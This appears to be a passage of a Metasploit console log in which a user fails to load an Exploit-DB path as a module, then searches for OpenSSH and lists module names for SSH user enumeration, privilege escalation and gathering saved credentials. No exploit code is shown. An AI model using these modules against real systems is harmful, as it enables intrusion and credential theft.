891 7 post/windows/gather/credentials/wsftp_client normal No Windows Gather WS_FTP Saved Password Extraction
892
893
894msf5 > linux/remote/45001.py
895[-] Unknown command: linux/remote/45001.py.
896msf5 > use linux/remote/45001.py
897[-] No results from search
898[-] Failed to load module: linux/remote/45001
899msf5 > search OpenSSH
900
901Matching Modules
902================
903
904 # Name Disclosure Date Rank Check Description
905 - ---- --------------- ---- ----- -----------
906 0 auxiliary/scanner/ssh/ssh_enumusers normal No SSH Username Enumeration
907 1 exploit/windows/local/unquoted_service_path 2001-10-25 excellent Yes Windows Unquoted Service Path Privilege Escalation
908 2 post/multi/gather/ssh_creds normal No Multi Gather OpenSSH PKI Credentials Collection
909 3 post/windows/manage/forward_pageant normal No Forward SSH Agent Requests To Remote Pageant
910 4 post/windows/manage/install_ssh normal No Install OpenSSH for Windows
911
912
913msf5 >